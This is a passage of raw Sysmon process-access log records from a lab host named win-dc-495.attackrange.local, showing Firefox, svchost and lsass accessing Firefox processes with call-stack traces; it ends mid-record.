10341000x800000000000000017295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.583{59A5CD1D-945A-6005-3305-00000000A301}70526276C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+f74b0e|C:\Program Files\Mozilla Firefox\xul.dll+1087037|C:\Program Files\Mozilla Firefox\xul.dll+11c4361|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+3b226|C:\Program Files\Mozilla Firefox\xul.dll+39bf2|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.583{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.583{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.548{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.548{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.520{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1042fa9|C:\Program Files\Mozilla Firefox\xul.dll+2bb7134|C:\Program Files\Mozilla Firefox\xul.dll+101d89a|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+a7a56f|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18 10341000x800000000000000017283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.504{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.504{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.485{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.479{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000017279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.479{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.479{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.479{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.477{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106d041|C:\Program Files\Mozilla Firefox\xul.dll+1724d76|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cf41|C:\Program Files\Mozilla Firefox\xul.dll+1724ba8|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106ce41|C:\Program Files\Mozilla Firefox\xul.dll+17249fe|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program 